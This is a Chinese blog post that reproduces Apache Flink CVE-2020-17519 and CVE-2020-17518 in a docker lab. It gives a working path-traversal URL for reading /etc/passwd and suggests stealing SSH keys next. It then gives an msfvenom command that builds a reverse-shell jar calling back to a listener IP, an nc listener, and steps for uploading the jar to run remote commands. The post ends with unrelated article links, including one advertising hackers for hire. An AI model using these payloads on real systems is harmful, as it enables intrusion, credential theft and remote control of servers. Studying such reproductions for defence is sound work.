Apache Flink任意文件读取(CVE-2020-17519)&& 任意文件上传(CVE-20...

访客3年前黑客文章1153

一、任意文件读取(CVE-2020-17519)

访问:http://your-ip:8081进入Apache Flink 控制面板:1610262786_5ffaa902b29b381ca4594.png!small

在地址栏使用poc:

http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

读取/etc/passwd文件:1610262830_5ffaa92e95e28382444ad.png!small

测试中发现在读取/etc/shadow文件不可行,存在权限问题,访问会直接报错:1610263845_5ffaad25424c99d7c52ca.png!small

但是可以尝试利用任意文件读取尝试去读取/home目录下的用户的.ssh文件夹的ssh私钥来进行ssh登录,再进行提取操作。(笔者未进行尝试,各位看官可以根据这个思路探索一哈)

二、任意文件上传(CVE-2020-17518)

Apache Flink 控制面板的Submit New Job处存在任意文件上传:

1610262886_5ffaa96608ed38c5d5253.png!small

使用POC:

1610263121_5ffaaa51910c318faa5c2.png!small

进入查看测试环境查看已经成功上传了success:

1610263294_5ffaaafe2016638eb924b.png!small

另外我们还可以上传上传jar马实现反弹监听从而进行远程命令执行

首先我们使用kali的MSF生成jar马:

msfvenom -p java/shell_reverse_tcp lhost=192.168.153.6 lport=5555 -f jar >/home/kali/Desktop/shell.jar

其中lhost为本地机器的IP,lport为反弹的端口。

1610263469_5ffaabadcaa8b87abf72c.png!small

可以看到成功生成了jar马(shell.jar)

1610263506_5ffaabd25c203be38eec3.png!small

然后本地机器新建命令行窗口,使用nc进行端口监听:nc -lvvp 5555

1610263589_5ffaac25d1a3c5f2c67ec.png!small

最后把生成的jar马通过Submit New Job模块进行上传:

1610263634_5ffaac5230cba46a90281.png!small

点击Submit即可实现jar马反弹监听:

1610263665_5ffaac71c862443b17efd.png!small

执行远程命令:

1610263696_5ffaac90f3217a55e76ac.png!small

这里看到他的启动不是root用户,更能验证任意读取文件时读取shadow文件报错,跟权限问题相关的。

1610263730_5ffaacb28f74e9a5a1277.png!small

三、结束语

本次复现均是docker本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

docker地址

https://github.com/vulhub/vulhub/tree/master/flink/

相关文章

凹凸世界手游凯莉送礼指南 凹凸世界凯莉喜欢的礼物介绍

凹凸世界手游凯莉送礼指南 凹凸世界凯莉喜欢的礼物介绍

最近玩凹凸世界这款手游的玩家都在问,游戏里 的凯莉喜欢什么?送什么礼物比较好了?目前凹凸世界手游开服没几天,77抽福利更新优化,玩家登录游戏即可直接获得,小编我特意整理了相关的资讯,带来了凯丽的送礼攻...

怎么屏蔽短信(教你几招屏蔽垃圾短信)

怎么屏蔽短信(教你几招屏蔽垃圾短信)

是不是还在为每天接受大量的垃圾短信而心烦,重庆交巡警微信公众号给大家支了几招,挺管用,一起来学学! 屏蔽垃圾短信的正确姿势别忙着退订 以前收到垃圾广告短信的时候,你可能还傻傻地按照它所说的回TD或...

延庆观炸鸡赚钱么?强势品牌想不赚都难

延庆观炸鸡赚钱么?强势品牌想不赚都难

最近,有个炸鸡加盟品牌火起来了,它是谁呢?它就是延庆观炸鸡。为什么火起来呢?作为延庆观炸鸡的总部,将公司的优势举办一系列的资源整合,而且还拥有着一条完善的供给链,颠末一次一次的优化,大幅度的低落了加盟...

QQ网购回应接入支付宝:我们将更加开放

6月8日,昨晚亿邦动力网报导了“腾讯官方集团旗下电子商务平台QQ网购已连接阿里集团公司集团旗下第三方支付专用工具支付宝钱包”一事,今日腾讯官方层面发过来回复称,QQ网购是一个网络技术开发者平台,腾...

淘宝怎么申请换货(淘宝买家需要换货要怎么操作?)

  淘宝怎么申请换货(淘宝买家需要换货要怎么操作?)当买家们在淘宝上面进行购物的时候,可能也会遇到因为配送的过程中的一些失误导致产品损坏,或者是因为卖家的一些失误而导致发货的时候,画错了产品款式了,而...

攻击app的黑客软件(黑客ip攻击软件)-一个黑客的真实收入

攻击app的黑客软件(黑客ip攻击软件)-一个黑客的真实收入

攻击app的黑客软件(黑客ip攻击软件)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...